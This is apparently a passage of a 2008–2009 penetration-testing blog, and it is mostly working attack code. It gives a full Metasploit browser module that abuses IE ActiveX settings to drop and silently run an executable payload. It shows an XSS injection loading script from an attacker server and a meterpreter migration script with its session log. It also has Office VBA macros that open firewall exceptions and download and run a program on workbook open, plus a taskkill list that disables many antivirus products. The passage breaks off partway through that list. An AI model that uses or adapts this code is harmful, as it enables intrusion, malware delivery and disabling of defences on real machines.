"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\";<br /> WshShell.RegWrite(regDefault + "1001",1,"REG_DWORD");<br /> WshShell.RegWrite(regDefault + "1004",3,"REG_DWORD");<br /> WshShell.RegWrite(regDefault + "1200",0,"REG_DWORD");<br /> WshShell.RegWrite(regDefault + "1201",3,"REG_DWORD");<br /><br /> //Clean up and delete the created entries<br /> setTimeout('WshShell.RegDelete(regIntranet + "1001")', 60000);<br /> setTimeout('WshShell.RegDelete(regIntranet + "1004")', 60000);<br /> setTimeout('WshShell.RegDelete(regIntranet + "1200")', 60000);<br /> setTimeout('WshShell.RegDelete(regIntranet + "1201")', 60000);<br /> setTimeout('WshShell.RegDelete(regIntranet + "1208")', 60000);<br /> setTimeout('WshShell.RegDelete(regRange)', 60000);<br /><br /> WshShell.Run("iexplore.exe -new http://#{datastore['PXHOST']}:#{datastore['PXPORT']}#{datastore['PXURI']}",0,false);<br />}<br /></script><br /></html>^<br /></code></pre>Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com1tag:blogger.com,1999:blog-8542235839869152787.post-7397939885751402312009-01-27T20:47:00.000-08:002009-02-27T14:37:32.848-08:00ie_unsafe_scripting metasploit moduleUpdate: This module now works as a standalone HTTP or javascript include. Also, we pushed this to SVN on 2/27/09.<br /><br />This one's not in the <a href="http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/">svn tree</a> yet; I'll update this post if it gets pulled in. I've had a couple of requests for it, so thought I would go ahead and drop it here.<br /><br />It's meant to be used on intranet XSS in environments that have the "Initialize and script ActiveX controls not marked as safe for scripting" set to "enabled". I've run into a few such environments set this way for compatibility with intranet web apps. Rather than turning it on for only those specific sites (or, ummm, fixing the sites), they grant it for the entire intranet.<br /><br />Intranet XSS is all over the place. Even the rock-dumb scanners like nikto will pick up dozens on a normal internal penetration test.<br /><br />Next steps: create a fast XSS scanner written in javascript to automatically exploit this stuff over the internet!<br /><br /><br />For use like so:<br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>http://vulnerable-server/vulnerable_web_app.asp?var="><script src=http://attacker-msf-server.com/ie_unsafe_scripting.js></script><br /></code></pre>Or, if you are actually sitting on the intranet and can get people to hit http://server/msf.htm<br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code><html><head></head><body><br /><script src=http://msf-server/ie_unsafe_scripting.js><br /></script></body></html></code></pre><br /><b>Explanation of how it works</b><br /><br />This works because this security setting grants access to the WScript ActiveX control from scripting languages in Internet Explorer (Javascript and VBScript). With this control you can (among other things):<br /><ul><li>Execute commands similar to a shell prompt (except you get to run these silently, without notifying the user) through WScript.Shell<br /></li><li>Create/delete/modify text file through WScript.FileSystemObject<br /></li></ul>Unfortunately, it does not allow you to directly write binary files to the file system. (You <i><b>can</b></i><b></b> use WScript.FileSystemObject to create a 'text' file that contains binary data, but <a href="http://blogs.msdn.com/ericlippert/comments/410127.aspx">this will only work if you are in an ANSI / ASCII-based version of Windows</a>, such as us in the USA. If you're in Japan, it apparently epicfails. No promises mine won't do the same thing, even though I've tried to work around it.)<br /><br />As a result, when you want to write a file to disk you use the ADODB.Stream ActiveX control. Unfortunately for bad guys and pentesters, IE7 put in a new security control called "Access data sources across domain", which now by default is set to prompt the user if they want to allow your script to talk to other 'domains'. (Windows / IE treats the filesystem as a different 'domain', and therefore you can't read/write to it if your code was loaded from http://intranet/.)<br /><br />But I can write text files and I can execute commands? Well, then I can write a script file directly to disk and then execute it, getting around the extra IE7 permissions!<br /><br />This module pushes javascript that instantiates the WScript.FileSystemObject, writes a vbscript file to the %TEMP% directory, executes the script with WScript.Shell, and deletes it. The vbscript:<br /><ul><li>has a metasploit executable payload stored inside a really big hex block, which is converted to an ANSI character array once the script runs</li><li>converts the character array into a binary array using some ADODB.Stream trickery (ADODB.Stream won't accept an ANSI character array as input to write a binary file; it'll give you a type error.)</li><li>feeds ADODB.Stream the now converted binaryArray that it likes, and is written to disk<br /></li></ul><br />There are some things that could be done to minimize the size of the transport, but this is working now so I don't see a lot of reason to slim it down any further. This module defaults to using gzip transfer encoding, which will probably make it about as small of a transfer as can easily be made.<br /><br />I randomized a bunch of junk, but I would assume those giant blocks of hex are probably very signatureable for the antivirus guys. If I really care, one day maybe I'll get around to doing some trickery so it encodes/decodes differently every time. For now, here it is:<br /><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>##<br />#<br />##<br /><br />##<br /># This file is part of the Metasploit Framework and may be subject to<br /># redistribution and commercial restrictions. Please see the Metasploit<br /># Framework web site for more information on licensing and terms of use.<br /># http://metasploit.com/projects/Framework/<br />##<br /><br /><br />require 'msf/core'<br /><br /><br />class Metasploit3 < Msf::Exploit::Remote<br /><br />include Msf::Exploit::Remote::HttpServer::HTML<br /><br />def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Internet Explorer Unsafe Scripting Misconfiguration',<br /> 'Description' => %q{<br /> This exploit takes advantage of the "Initialize and script ActiveX controls not<br /> marked safe for scripting" setting within Internet Explorer. When this option is set,<br /> IE allows access to the WScript.Shell ActiveX control, which allows javascript to<br /> interact with the file system and run commands. This security flaw is not uncommon<br /> in corporate environments for the 'Intranet' or 'Trusted Site' zones. In order to<br /> save binary data to the file system, ADODB.Stream access is required, which in IE7<br /> will trigger a cross domain access violation. As such, we write the code to a .vbs<br /> file and execute it from there, where no such restrictions exist.<br /> <br /> When set via domain policy, the most common registry entry to modify is HKLM\<br /> Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201,<br /> which if set to '0' forces ActiveX controls not marked safe for scripting to be<br /> enabled for the Intranet zone.<br /> <br /> This module creates javascript code meant to be included in a <SCRIPT> tag, such as<br /> http://intranet-server/xss.asp?id="><script%20src=http://10.10.10.10/ie_unsafe_script.js><br /> </script>.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' =><br /> [<br /> 'natron'<br /> ],<br /> 'Version' => '$Revision:$',<br /> 'References' =><br /> [<br /> [ 'MS', 'http://support.microsoft.com/kb/182569' ],<br /> ],<br /> 'Payload' =><br /> {<br /> 'Space' => 4000,<br /> 'StackAdjustment' => -3500,<br /> },<br /> 'Platform' => 'win',<br /> 'Targets' =><br /> [<br /> [ 'Automatic', { } ],<br /><br /> ],<br /> 'DefaultOptions' =><br /> {<br /> 'HTTP::compression' => 'gzip'<br /> },<br /> 'DefaultTarget' => 0))<br />end<br /><br />def on_request_uri(cli, request)<br /><br /> #print_status("Starting...");<br /> # Build out the HTML response page<br /> var_shellobj = rand_text_alpha(rand(5)+5);<br /> var_fsobj = rand_text_alpha(rand(5)+5);<br /> var_fsobj_file = rand_text_alpha(rand(5)+5);<br /> var_vbsname = rand_text_alpha(rand(5)+5);<br /> var_writedir = rand_text_alpha(rand(5)+5);<br /> var_exename = rand_text_alpha(rand(5)+5);<br /> var_origLoc = rand_text_alpha(rand(5)+5);<br /> var_byteArray = rand_text_alpha(rand(5)+5);<br /> var_stream = rand_text_alpha(rand(5)+5);<br /> var_writestream = rand_text_alpha(rand(5)+5);<br /> var_strmConv = rand_text_alpha(rand(5)+5);<br /><br /> p = regenerate_payload(cli);<br /> #print_status("Genning payload...");<br /> exe = Rex::Text.to_win32pe(p.encoded, '');<br /> #print_status("Building vbs file...");<br /> # Build the content that will end up in the .vbs file<br /> vbs_content = Rex::Text.to_hex(%Q|Dim #{var_origLoc}, s, #{var_byteArray}<br />#{var_origLoc} = SetLocale(1033)<br />|)<br /><br /> print_status("Encoding payload into vbs/javascript...");<br /> # Drop the exe payload into an ansi string (ansi ensured via SetLocale above)<br /> # for conversion with ADODB.Stream<br /> vbs_content << Rex::Text.to_hex("\ts = s & Chr(CInt(\"&H#{("%.2x" % exe[0]).upcase}\"))\r\n")<br /><br /> 1.upto(exe.length) do |i|<br /> vbs_content << Rex::Text.to_hex("\ts = s & Chr(CInt(\"&H#{("%.2x" % exe[i]).upcase}\"))\r\n")<br /> end<br /><br /> # Continue with the rest of the vbs file;<br /> # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent<br /> # Then use ADODB.Stream again to write the binary to file.<br /> #print_status("Finishing vbs...");<br /> vbs_content << Rex::Text.to_hex(%Q|<br />Dim #{var_strmConv}, #{var_writedir}, #{var_writestream}<br />#{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{var_exename}.exe"<br /><br />Set #{var_strmConv} = CreateObject("ADODB.Stream")<br /><br />#{var_strmConv}.Type = 2<br />#{var_strmConv}.Charset = "x-ansi"<br />#{var_strmConv}.Open<br />#{var_strmConv}.WriteText s, 0<br />#{var_strmConv}.Position = 0<br />#{var_strmConv}.Type = 1<br />#{var_byteArray} = #{var_strmConv}.Read<br /><br />Set #{var_writestream} = CreateObject("ADODB.Stream")<br /><br />#{var_writestream}.Type = 1<br />#{var_writestream}.Open<br />#{var_writestream}.Write #{var_byteArray}<br />#{var_writestream}.SaveToFile #{var_writedir}, 2<br /><br />SetLocale(#{var_origLoc})|)<br /><br /> # Encode the vbs_content<br /> #print_status("Hex encoded vbs_content: #{vbs_content}");<br /><br /> # Build the javascript that will be served<br /> js_content = %Q|var #{var_shellobj} = new ActiveXObject("WScript.Shell");<br />var #{var_fsobj} = new ActiveXObject("Scripting.FileSystemObject");<br />var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%");<br />var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs",2,true);<br /><br />#{var_fsobj_file}.Write(unescape("#{vbs_content}"));<br />#{var_fsobj_file}.Close();<br /><br />#{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);<br />#{var_shellobj}.run(#{var_writedir} + "\\\\" + "#{var_exename}.exe", 0, false);<br />#{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");<br />|<br /><br /> print_status("Sending exploit javascript to #{cli.peerhost}:#{cli.peerport}...");<br /> print_status("Exe will be #{var_exename}.exe and must be manually removed from the %TEMP% directory on the target.");<br /><br /> # Transmit the response to the client<br /> send_response(cli, js_content, { 'Content-Type' => 'text/javascript' })<br /><br /> # Handle the payload<br /> handler(cli) <br />end<br />end<br /></code></pre>Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com1tag:blogger.com,1999:blog-8542235839869152787.post-52595693458072010122008-12-17T10:20:00.000-08:002008-12-17T11:25:10.130-08:00Default IE7 Settings for XP SP3 and Server 2003 SP1In doing some research on IE7 permissions I searched high and low on the MSDN and similar places, and couldn't find a complete list of default settings. So, I created the following spreadsheet to document what was available, by default, for the various security zones ('Intranet', 'Internet', etc). This was a quick analysis and only includes those with 'simple' registry values (like 0, 1, etc), and doesn't parse out any of the more complex values. See <a href="http://support.microsoft.com/kb/182569">this MS link</a> for more info.<br /><br />When I created it, I looked at a fresh XP SP3 install and an almost new Server 2003 SP1 install. I followed the rules for precedence when conflicting rules are in place (e.g. HKLM vs HKCU, Domain policy over default HKLM/HKCU, etc) and came up with the final results. At some point, I'll go back and do it properly with complete documentation of the sources of the various settings, but in the mean time if anyone else would find this useful, here ya go.<br /><br />Specifically, the settings that may be interested to look at are:<br /><br /><ul><li>1206 Miscellaneous: Allow scripting of Internet Explorer Web browser control ^</li><li>1208 ActiveX controls and plug-ins: Allow previously unused ActiveX controls to run without prompt ^</li><li>1209 ActiveX controls and plug-ins: Allow Scriptlets</li><li>1407 Scripting: Allow Programmatic clipboard access</li><li>1607 Miscellaneous: Navigate sub-frames across different domains</li><li>1805 Launching programs and files in webview #</li><li>1806 Miscellaneous: Launching applications and unsafe files</li><li>1809 Miscellaneous: Use Pop-up Blocker ** ^</li><li>1A04 Miscellaneous: Don't prompt for client certificate selection when no certificates or only one certificate exists * ^</li><li>1A05 Allow 3rd party persistent cookies *</li><li>1A10 Privacy Settings *</li><li>2102 Miscellaneous: Allow script initiated windows without size or position constraints ** ^</li><li>2103 Scripting: Allow status bar updates via script ^</li><li>2104 Miscellaneous: Allow websites to open windows without address or status bars ^</li><li>2105 Scripting: Allow websites to prompt for information using scripted windows ^</li><li>2200 Downloads: Automatic prompting for file downloads ** ^</li><li>2201 ActiveX controls and plug-ins: Automatic prompting for ActiveX controls ** ^</li><li>2301 Miscellaneous: Use Phishing Filter ^</li><li>1207 Reserved #</li><li>1408 Reserved #</li><li>1807 Reserved ** #</li><li>180A Reserved #</li><li>180D Reserved #</li></ul><br />Lastly, if any of you who review this notice your settings at are different from these, please drop me an email.<br /><br />The default IE7 settings are located at the below registry entries. If policy-enforced settings are in placed, they override whatever is set here.<br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings<br />HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings<br /></code></pre><br /><a href="http://spreadsheets.google.com/ccc?key=pPb4M5mLTAttAB-flW0VIaw">Default Windows IE7 Permissions</a><br /><br /><iframe src="http://spreadsheets.google.com/pub?key=pPb4M5mLTAttAB-flW0VIaw&output=html&widget=true" width="550" frameborder="0" height="300"></iframe>Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com0tag:blogger.com,1999:blog-8542235839869152787.post-13913079440250113132008-12-12T13:40:00.000-08:002008-12-12T14:40:10.268-08:00Automatic migration to a new process with meterpreterPlaying with <a href=http://www.metasploit.com>metasploit</a>'s <a href=http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4844>new</a> <a href=http://www.breakingpointsystems.com/community/blog/patch-tuesdays-and-drive-by-sundays>ie_xml_corruption</a> <a href=http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ie_xml_corruption.rb>module</a>, I needed a way to automatically migrate outside of the current process (iexplore.exe). This particular exploit locks up the process upon exploitation, leaving the user sitting at a hung Internet Explorer. Should a user ctrl+alt+delete and terminate it, I didn't want to lose the session. <br /><br />An <a href=http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/migrate.rb>example migrate script</a> exists that will do some of this, but if you use it in it's default form, it migrates to lsass.exe. If meterpreter then crashes (or you close it), it'll kill the whole process... which you certainly don't want to do with lsass. Also, my little script has the added benefit of working even if the exploited user doesn't have admin privileges (and LSASS migration would then be impossible).<br /><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>msf exploit(ie_xml_corruption) > exploit<br />[*] Exploit running as background job.<br />[*] Handler binding to LHOST 192.168.182.1<br />[*] Started reverse handler<br />[*] Using URL: http://192.168.182.1:80/ie-xml-corruption.html<br />[*] Server started.<br />[*] Sending HTML to 192.168.182.1:2761...<br />[*] Sending DLL to 192.168.182.1:2761...<br />[*] Transmitting intermediate stager for over-sized stage...(191 bytes)<br />[*] Sending stage (75776 bytes)<br />[*] Meterpreter session 5 opened (192.168.182.1:4444 -> 192.168.182.1:2762)<br />msf exploit(ie_xml_corruption) > sessions -i 5<br />[*] Starting interaction with 5...<br /><br />run launch_and_migrate<br />[*] Launching hidden cmd.exe...<br />[*] Process 5560 created.<br />[*] Current process is IEXPLORE.EXE (656). Migrating to 5560.<br />[*] Migration completed successfully.<br />[*] New server process: cmd.exe (5560)<br />[*] Old process 656 killed.<br /></code></pre><br /><br />Save the file to .msf3/scripts/meterpreter/ (may need to create the subdirectories) and it'll become available to your meterpreter sessions. You should be able to set the script to <a href=http://trac.metasploit.com/wiki/AutomatingMeterpreter>automatically run</a> with the advanced AutoRunScript option:<br /><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>Payload advanced options (windows/reflectivemeterpreter/reverse_tcp):<br /><br /> Name : AutoLoadStdapi<br /> Current Setting: true<br /> Description : Automatically load the Stdapi extension<br /><br /> Name : AutoRunScript<br /> Current Setting: <br /> Description : Script to autorun on meterpreter session creation<br /></code></pre><br /><br />... but I couldn't get it to work in the few minutes I had to play with it. It may be broken on Windows, or I just may not be able to figure out how to do paths in Windows + Ruby. I'll check with my linux install over the weekend.<br /><br />And here's the code:<br /><br /><a href=http://sites.google.com/a/invisibledenizen.org/upload/asdf/launch_and_migrate.rb>launch_and_migrate.rb</a><br /><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>##<br />## Meterpreter script that launches a hidden process, <br />## migrates to it, then kills the old process.<br />##<br />## Provided by natron (natron 0x40 invisibledenizen 0x2E com)<br />##<br /><br /># Get the target process name<br />target = args[0] || "cmd.exe"<br /><br />def launchProc(target)<br /> print_status("Launching hidden #{target}...")<br /><br /> # Set the vars; these can of course be modified if need be<br /> cmd_exec = target<br /> cmd_args = nil<br /> hidden = true<br /> channelized = nil<br /> use_thread_token = false<br /><br /> # Launch new process<br /> newproc = client.sys.process.execute(cmd_exec, cmd_args, <br /> 'Channelized' => channelized,<br /> 'Hidden' => hidden,<br /> 'InMemory' => nil,<br /> 'UseThreadToken' => use_thread_token)<br /><br /> print_status("Process #{newproc.pid} created.")<br /> <br /> return newproc<br />end<br /><br />def migrateToProc(newproc)<br /> # Grab the current pid info<br /> server = client.sys.process.open<br /> print_status("Current process is #{server.name} (#{server.pid}). Migrating to #{newproc.pid}.")<br /> <br /> # Save the old process info so we can kill it after migration.<br /> oldproc = server.pid<br /> <br /> # Do the migration<br /> client.core.migrate(newproc.pid.to_i)<br /><br /> print_status("Migration completed successfully.")<br /><br /> # Grab new process info<br /> server = client.sys.process.open<br /><br /> print_status("New server process: #{server.name} (#{server.pid})")<br /> <br /> return oldproc<br />end<br /><br />def killApp(procpid)<br /> client.sys.process.kill(procpid)<br /> print_status("Old process #{procpid} killed.")<br />end<br /><br /># Main flow of execution<br />newProcPid = launchProc(target)<br />oldProc = migrateToProc(newProcPid)<br />killApp(oldProc)<br /></code></pre>Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com2tag:blogger.com,1999:blog-8542235839869152787.post-64700723523996592972008-11-16T18:52:00.001-08:002008-11-16T18:52:56.672-08:00< PRE > tags suck.Apparently the < PRE > tag kills blogger's ability to do wordwrapping. Awesome. Someone with better blogging skills than I: what's the solution?Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com3tag:blogger.com,1999:blog-8542235839869152787.post-72675032537784971982008-11-16T18:36:00.000-08:002008-12-12T14:54:40.019-08:00Modifying Windows Firewall Rules from VBAYou can also modify the Microsoft Windows firewall from within VBA using the HNetCfg.FwMgr object. Versions of these scripts are available on MSDN.<br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>Function Add_App_To_Firewall(program_name, program_executable, program_scope)<br /> <br /> Const NET_FW_PROFILE_DOMAIN = 0<br /> Const NET_FW_PROFILE_STANDARD = 1<br /><br /> Const NET_FW_SCOPE_ALL_NAME = "All subnets"<br /> Const NET_FW_SCOPE_LOCAL_SUBNET_NAME = "Local subnet only"<br /> <br /> Const NET_FW_IP_VERSION_ANY = 2<br /> <br /> ' Create the firewall manager object.<br /> Dim fwMgr<br /> Set fwMgr = CreateObject("HNetCfg.FwMgr")<br /><br /> ' Get the current profile for the local firewall policy.<br /> Dim profile<br /> Set profile = fwMgr.LocalPolicy.CurrentProfile<br /> <br /> Dim app<br /> Set app = CreateObject("HNetCfg.FwAuthorizedApplication")<br /><br /> app.ProcessImageFileName = program_executable<br /> app.Name = program_name<br /> app.Scope = program_scope<br /> <br /> app.IpVersion = NET_FW_IP_VERSION_ANY<br /> app.Enabled = True<br /><br /> On Error Resume Next<br /> profile.AuthorizedApplications.Add app<br /><br />End Function<br /><br />Function Remove_App_From_Firewall(program_executable)<br /><br /> On Error Resume Next<br /><br /> ' Create the firewall manager object.<br /> Dim fwMgr<br /> Set fwMgr = CreateObject("HNetCfg.FwMgr")<br /> <br /> ' Get the current profile for the firewall<br /> Dim fwPolicy<br /> Set fwPolicy = fwMgr.LocalPolicy.CurrentProfile<br /> <br /> ' Get the Auth Applications object so we can modify<br /> Dim colApplications<br /> Set colApplications = fwPolicy.AuthorizedApplications<br /> <br /> colApplications.Remove program_executable<br /><br />End Function<br /></code></pre><br />As an example, here's the commands that will download the Tiny Web Server from the internet, unzip it, add it to the allowed exceptions list for the Windows FW, create a quick .html file, start the server, run Internet Explorer pointed to this server, then kill the server, remove the firewall rule, and delete all of the files.<br /><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>Sub Workbook_Open()<br /> 'Download tiny web server to the %TEMP% directory, use local copy of winzip to unzip<br /> 'Obviously in a real world application you'd want to bring your own unzipper<br /> Download_File "http://www.ritlabs.com/download/tinyweb/tinyweb.zip", Environ("TEMP") &amp; "\tinyweb.zip"<br /> Run_Program "winzip", "-e -o %TEMP%\tinyweb.zip %TEMP%", INVISIBLE, WAIT<br /> <br /> Const NET_FW_SCOPE_ALL = 0, NET_FW_SCOPE_LOCAL_SUBNET = 1, NET_FW_SCOPE_CUSTOM = 2<br /> Add_App_To_Firewall "tiny-local", Environ("TEMP") &amp; "\tiny.exe", NET_FW_SCOPE_LOCAL_SUBNET<br /> <br /> Run_Cmd "echo iexplore-pwned > %TEMP%\index.html", INVISIBLE, WAIT<br /> <br /> Run_Program "%TEMP%\tiny.exe", "%TEMP% 12345", INVISIBLE, NOWAIT<br /> <br /> ' "Sleep" for a couple of seconds to allow tiny.exe to load<br /> Run_Cmd "ping -n 2 127.0.0.1", INVISIBLE, WAIT<br /> <br /> Run_Program "iexplore", "http://127.0.0.1:12345", VISIBLE, WAIT<br /> <br /> Run_Cmd "taskkill /F /IM tiny.exe", INVISIBLE, WAIT<br /> <br /> Remove_App_From_Firewall Environ("TEMP") &amp; "\tiny.exe"<br /> <br /> On Error Resume Next<br /> Kill Environ("TEMP") &amp; "\tinyweb.zip"<br /> Kill Environ("TEMP") &amp; "\SRC.zip"<br /> Kill Environ("TEMP") &amp; "\LICENSE.txt"<br /> Kill Environ("TEMP") &amp; "\File_id.diz"<br /> Kill Environ("TEMP") &amp; "\Readme.txt"<br /> Kill Environ("TEMP") &amp; "\Cgitest.zip"<br /> Kill Environ("TEMP") &amp; "\index.html"<br /> Kill Environ("TEMP") &amp; "\tiny.exe"<br /><br />End Sub<br /></code></pre>Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com0tag:blogger.com,1999:blog-8542235839869152787.post-33332505716755947662008-11-16T18:32:00.000-08:002008-12-12T14:56:05.880-08:00How to Kill Antivirus from Word or Excel VBABuilding off of the previous posts and functions, here's how to kill off antivirus from within a VBA Macro in Excel or Word (I stole this list from the <a href="http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/killav.rb">meterpreter script</a>):<br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>Function Build_Cmd_List(arrayCmds, command)<br /> <br /> If arrayCmds(0) <> "" Then<br /> ReDim Preserve arrayCmds(UBound(arrayCmds) + 1) As String<br /> End If<br /> <br /> arrayCmds(UBound(arrayCmds)) = command<br /> <br />End Function<br /><br />Function Kill_AV()<br /><br /> Dim arrayCmds() As String<br /> ReDim arrayCmds(0) As String<br /> On Error Resume Next<br /><br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avp32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avpcc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avpm.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ackwin32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""adaware.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""advxdwin.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""agentsvr.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""agentw.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""alertsvc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""alevir.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""alogserv.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""amon9x.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""anti-trojan.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""antivirus.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ants.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""apimonitor.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""aplica32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""apvxdwin.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""arr.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""atcon.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""atguard.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""atro55en.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""atupdater.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""atwatch.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""au.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""aupdate.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""auto-protect.nav80try.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""autodown.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""autotrace.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""autoupdate.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avconsol.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ave32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgcc32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgctrl.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgnt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avguard.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkserv.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avnt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpcc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpdos32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpm.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avptc32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsched32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwin.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwin95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackd.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackice.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiadmin.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95cf.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner3.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""defwatch.exe"""<br /> 